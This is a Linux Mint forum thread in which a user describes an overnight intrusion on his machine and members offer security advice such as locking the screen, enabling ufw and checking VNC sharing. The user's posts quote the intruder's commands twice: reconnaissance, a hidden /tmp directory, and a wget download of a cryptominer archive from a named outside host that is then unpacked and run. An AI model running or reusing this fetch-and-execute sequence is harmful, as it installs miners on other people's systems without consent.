How did I get hacked? - Solved

Questions about other topics - please check if your question fits better in another category before posting here
Forum rules
Before you post please read how to get help
PPPeter
Level 1
Level 1
Posts: 9
Joined: Wed Feb 07, 2018 6:14 am

How did I get hacked? - Solved

Post by PPPeter » Wed Feb 07, 2018 6:35 am

Hi all, hoping someone can help me with some security advice.

I recently installed Linux Mint Cinnamon 18.3 on one of my boxes. I left it running overnight with an open Terminal window (I was running Handbrake on a bunch of my DVDs). The following moning I found evidence in the Terminal window that I had been hacked - the commands below had been run (I've omitted the output from the commands as there was a lot of it):

peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $

I've done some searching and this appears to be an attempt to hijack my PC to mine some crypto currency (Monero or Aeon, not sure). Anyway, the "screen" command failed (not installed) and the shell script x.sh issued a whole load or error messages so the hacker was out of luck.

I don't have anti-virus installed (I know, big mistake, but lesson learned) but I still don't understand how I got hacked. I only installed software from the Software Centre, and I only visited reputable sites mainly to get info on how to do things in Linux.

I switched the box off (after copying the evidence to another server) and will be reinstalling Linux Mint afresh before I use it again. I'm looking for advice on how to protect myself better, e.g. what anti-virus to install, and anything else I can do.

Thanks in advance.
Last edited by PPPeter on Wed Feb 07, 2018 11:36 am, edited 1 time in total.

PPPeter
Level 1
Level 1
Posts: 9
Joined: Wed Feb 07, 2018 6:14 am

Re: Not another Mint anti virus question.

Post by PPPeter » Wed Feb 07, 2018 7:04 am

Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.

Don't say anti-virus is unnecessary, it most definitley is necessary

User avatar
Moem
Level 13
Level 13
Posts: 4823
Joined: Tue Nov 17, 2015 9:14 am
Location: The Netherlands
Contact:

Re: Not another Mint anti virus question.

Post by Moem » Wed Feb 07, 2018 7:14 am

PPPeter wrote:Why do so many people say that you don't need anti-virus for Linux?
Because it's true.

And if even if it's true that you got hacked, that is a very different thing than a virus. Let's not confuse things.
Image

If your issue is solved, kindly indicate that by editing the first post in the topic, and adding [SOLVED] to the title. Thanks!

User avatar
Pjotr
Level 19
Level 19
Posts: 9639
Joined: Mon Mar 07, 2011 10:18 am
Location: The Netherlands (Holland)
Contact:

Re: Not another Mint anti virus question.

Post by Pjotr » Wed Feb 07, 2018 7:15 am

PPPeter wrote:Why do so many people say that you don't need anti-virus for Linux? I installed Linux Mint on one of my boxes a few weeks ago, I only installed software from the Software Centre, I only visited websites to find out how to do various simple things in Linux (VNC, Samba, and mounting disks), I didn't access any emails, and still I got hacked. After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.

Don't say anti-virus is unnecessary, it most definitley is necessary
More proof please.

And even if you could supply this proof: why do you think that AV would have protected you against this hijack attempt?
Last edited by Pjotr on Wed Feb 07, 2018 7:48 am, edited 1 time in total.
Tip: 10 things to do after installing Linux Mint 18.3 Sylvia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.

Cosmo.
Level 22
Level 22
Posts: 16628
Joined: Sat Dec 06, 2014 7:34 am

Re: Not another Mint anti virus question.

Post by Cosmo. » Wed Feb 07, 2018 7:29 am

PPPeter wrote:After leaving my computer on overnight I found a Terminal window open with evidence of someone trying to hijack my PC to mine a cryptocurrency.
This would hd been the most stupid attacker, if he demonstrates his activity inn such an obvious way. Actually this looks for somebody had local access. No AV would be able to do something against that. - And you seem to have done the mistake to at least lock your screen over night.

Or with another attempt to interpret your post: If you should really have done nothing except what you described: Than it would mean, that the attack would had been build inside of your system. Think about it.
If I look at your other post / thread, than it is obvious, that this, what you wrote here (installed nothing from outside of the official repositories) is simply untrue. Think about that also.

User avatar
Pjotr
Level 19
Level 19
Posts: 9639
Joined: Mon Mar 07, 2011 10:18 am
Location: The Netherlands (Holland)
Contact:

Re: How did I get hacked?

Post by Pjotr » Wed Feb 07, 2018 7:34 am

A hacking attempt has nothing to do at all with a virus. So antivirus certainly wouldn't have helped against this. I advise to remove that newly installed AV from your system, because it'll only make it less secure.

It looks like a local attack: somebody who had physical access to your computer. If you leave the computer on during your absence, make sure that your screen is locked with a password.

Or even better: lock the room in which you've put your computer, because physical access will always remain a risk. No matter what.

Keep your system fully updated, don't install stuff from non-official repo's, be careful with browser add-ons, sandbox some high-risk applications (web browsers!) with Firejail and above all: use your common sense. Do all that, and then: relax, you're running Linux. :mrgreen:
Tip: 10 things to do after installing Linux Mint 18.3 Sylvia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.

User avatar
Pjotr
Level 19
Level 19
Posts: 9639
Joined: Mon Mar 07, 2011 10:18 am
Location: The Netherlands (Holland)
Contact:

Re: Not another Mint anti virus question.

Post by Pjotr » Wed Feb 07, 2018 7:47 am

This is the link to the separate topic that PPPeter has started for his problem:
viewtopic.php?f=18&t=263447

--Edit: rectified.
Last edited by Pjotr on Wed Feb 07, 2018 7:56 am, edited 2 times in total.
Tip: 10 things to do after installing Linux Mint 18.3 Sylvia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.

Cosmo.
Level 22
Level 22
Posts: 16628
Joined: Sat Dec 06, 2014 7:34 am

Re: Not another Mint anti virus question.

Post by Cosmo. » Wed Feb 07, 2018 7:51 am

This thread is, what I mentioned in my last sentence.

User avatar
Pjotr
Level 19
Level 19
Posts: 9639
Joined: Mon Mar 07, 2011 10:18 am
Location: The Netherlands (Holland)
Contact:

Re: Not another Mint anti virus question.

Post by Pjotr » Wed Feb 07, 2018 7:55 am

Cosmo. wrote:This thread is, what I mentioned in my last sentence.
Yes, sorry, my wording was inexact. I'll rectify my previous message.
Tip: 10 things to do after installing Linux Mint 18.3 Sylvia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.

Cosmo.
Level 22
Level 22
Posts: 16628
Joined: Sat Dec 06, 2014 7:34 am

Re: How did I get hacked?

Post by Cosmo. » Wed Feb 07, 2018 7:55 am

Alone the line, where "chmod" had been mistyped at first makes it obvious, that there was a human at work.

tdockery97
Level 14
Level 14
Posts: 5026
Joined: Sun Jan 10, 2010 8:54 am
Location: Salem, Oregon
Contact:

Re: How did I get hacked?

Post by tdockery97 » Wed Feb 07, 2018 7:57 am

You may want to turn your firewall on also. :wink:
Linux Mint 18.3 KDE

PPPeter
Level 1
Level 1
Posts: 9
Joined: Wed Feb 07, 2018 6:14 am

Re: Not another Mint anti virus question.

Post by PPPeter » Wed Feb 07, 2018 7:59 am

Proof: these are the commands (output omitted for brevity) I found in the terminal window:
peter@TheBeast /media/peter/ISO2 $ lspci
peter@TheBeast /media/peter/ISO2 $ cat /proc/cpuinfo
peter@TheBeast /media/peter/ISO2 $ cd /tmp
peter@TheBeast /tmp $ mkdir ...
peter@TheBeast /tmp $ cd ...
peter@TheBeast /tmp/... $ wget mafiagalati.hi2.ro/aeon.tgz
peter@TheBeast /tmp/... $ tar xvf aeon.tgz
peter@TheBeast /tmp/... $ rm -rf aeon.tgz
peter@TheBeast /tmp/... $ cd .x
peter@TheBeast /tmp/.../.x $ chmpd +x *
peter@TheBeast /tmp/.../.x $ chmod +x *
peter@TheBeast /tmp/.../.x $ screen
peter@TheBeast /tmp/.../.x $ ./x.sh
peter@TheBeast /tmp/.../.x $ ^C
peter@TheBeast /tmp/.../.x $

I agree, it must have been a very stupid atacker. And no, it was not someone sitting at the computer, unless they broke into my property while I was asleep and did nothing else other than sit at my PC and run a few commands. Yes, I did leave the computer unlocked - a mistake I won't make again. Clearly you guys think I'm trolling, I'm not, I'm just relaying my experience. Maybe you are right, maybe anti-virus wouldn't have helped, in which case please tell me what would have helped. And don't insinuate that I am lying. I don't even know how to install anything outside of the software center and I have never access my email accounts in Linux.

PPPeter
Level 1
Level 1
Posts: 9
Joined: Wed Feb 07, 2018 6:14 am

Re: How did I get hacked?

Post by PPPeter » Wed Feb 07, 2018 11:05 am

Thanks for the replies. I am 100% certain it was not a local attack, I live alone and my property is secure. I haven't yet installed an anti-virus, perhaps I don't need to. I will certainly be more security conscious in future and shutdown the PC whenever I am not physically present. I only left it on as I was running Handbrake in batch mode. That's all done now.

Re switching on firewall, Steve Gibson's "Shields Up" gives my router a "perfect TruStealth" rating, whatever that means. Do I need to configure anything in Linux for a firewall?

Thanks again.

User avatar
Pierre
Level 16
Level 16
Posts: 6131
Joined: Fri Sep 05, 2008 5:33 am
Location: Perth, AU.

Re: How did I get hacked?

Post by Pierre » Wed Feb 07, 2018 11:27 am

the firewall in LinuxMint is installed, but not Turned On:

Open a Terminal and type

Code: Select all

sudo ufw status
and that will tell you if the firewall is active or not. If it isn't then type

Code: Select all

sudo ufw enable
Image
Please edit your original post title to include [SOLVED] - when your problem is solved!
and DO LOOK at those Unanswered Topics - - you may be able to answer some!.

PPPeter
Level 1
Level 1
Posts: 9
Joined: Wed Feb 07, 2018 6:14 am

Re: How did I get hacked? - Solved

Post by PPPeter » Wed Feb 07, 2018 11:36 am

Great stuff. Thanks very much!

User avatar
thx-1138
Level 4
Level 4
Posts: 498
Joined: Fri Mar 10, 2017 12:15 pm
Location: Athens, Greece

Re: Not another Mint anti virus question.

Post by thx-1138 » Wed Feb 07, 2018 11:40 am

https://www.virustotal.com/#/file/21587 ... /detection
So you can be certain that AV wouldn't have helped...

...it appears to be a Monero miner btw:
https://github.com/fireice-uk/xmr-stak

greerd
Level 5
Level 5
Posts: 839
Joined: Sat Jul 31, 2010 10:58 am
Location: Nova Scotia, Canada

Re: Not another Mint anti virus question.

Post by greerd » Wed Feb 07, 2018 11:49 am

PPPeter wrote:
Wed Feb 07, 2018 7:59 am
I don't see how remote access would open or leave open a terminal window on your desktop by using ssh or any terminal access, the only way that this could be done (afaik) is to use a vnc program that logs into DESKTOP:0.

You mentioned in an earlier post that you searched for info on vnc, did you go through setting up Desktop Sharing (vino)? If so did you leave it enabled and leave all security settings unchecked?

The firewall in Mint isn't enabled by default, was it enabled (to default allow-out, deny-in) during you episode?
Image

User avatar
chrisuk
Level 5
Level 5
Posts: 527
Joined: Thu Jun 12, 2008 6:16 am

Re: How did I get hacked? - Solved

Post by chrisuk » Wed Feb 07, 2018 12:09 pm

Assuming that I've not misunderstood your post:

Just to dispel the myth... Linux is not magically immune to malware, you're just less likely to be infected in Linux than Windows. Note the "less likely", regardless of what others will continually tell you, it is not impossible.

Now, if you are 100% certain that nobody had physical access to your machine, and you don't have multiple personalities (I'm being serious, some people have such an illness) - then you was either hacked or you have a Poltergeist. Either way, it warrants further investigation. If you just get replies such as "you can't be hacked, it's Linux" - then I suggest you try a forum with better informed members, maybe devoted to security.

However, I suspect that someone was following an online guide... they never made it to the "Erasing your tracks" section - and the fact you can see all those commands reinforces the idea that they didn't know what they was doing.

So I suggest that you copy/paste your post to other forums more focused on security. You may never find out what happened, and it may never happen again, but you might get a meaningful explanation of what and why... though not who ;)
Chris

Manjaro MATE - MX Linux - LMDE MATE

Ozo
Level 4
Level 4
Posts: 487
Joined: Tue Dec 22, 2015 11:49 am
Location: Titusville, Florida USA

Re: How did I get hacked? - Solved

Post by Ozo » Wed Feb 07, 2018 12:38 pm

Don't be gullible. This poster just signed on so has no history on this forum. My conspiracy theory is that they made this up as they could not actually hack Linux themselves. This could be an attempt at spreading fear among the users. I for one am not afraid which is one reason I can see right through stuff like this.

I apologize to the OP if I am wrong but I do not believe in coincidence.

User avatar
Pjotr
Level 19
Level 19
Posts: 9639
Joined: Mon Mar 07, 2011 10:18 am
Location: The Netherlands (Holland)
Contact:

Re: How did I get hacked? - Solved

Post by Pjotr » Wed Feb 07, 2018 12:58 pm

chrisuk wrote:
Wed Feb 07, 2018 12:09 pm
If you just get replies such as "you can't be hacked, it's Linux" - then I suggest you try a forum with better informed members, maybe devoted to security.
Nobody said that.

@Ozo: that thought has crossed my mind as well.
Tip: 10 things to do after installing Linux Mint 18.3 Sylvia
Keep your Linux Mint healthy: Avoid these 10 fatal mistakes
Twitter: twitter.com/easylinuxtips
All in all, horse sense simply makes sense.

Post Reply

Return to “Other topics”